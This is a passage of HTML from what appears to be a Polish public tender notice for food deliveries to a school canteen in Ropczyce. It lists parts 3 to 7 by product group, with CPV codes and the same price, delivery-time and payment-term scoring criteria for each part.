Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr III - Produkty mleczarskie, jaja - <br/>CPV 15500000-3; CPV – 03142500-3; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr IV - Produkty mięsne (wieprzowe i wołowe) - CPV 15100000-9, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr V - Produkty mięsne (drobiowe)- CPV 15112000-6; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr VI Warzywa i owoce – CPV 03200000-3; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03200000-3 - Zboża, ziemniaki, warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr VII Ryby mrożone, filety rybne – CPV-15220000-6. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> 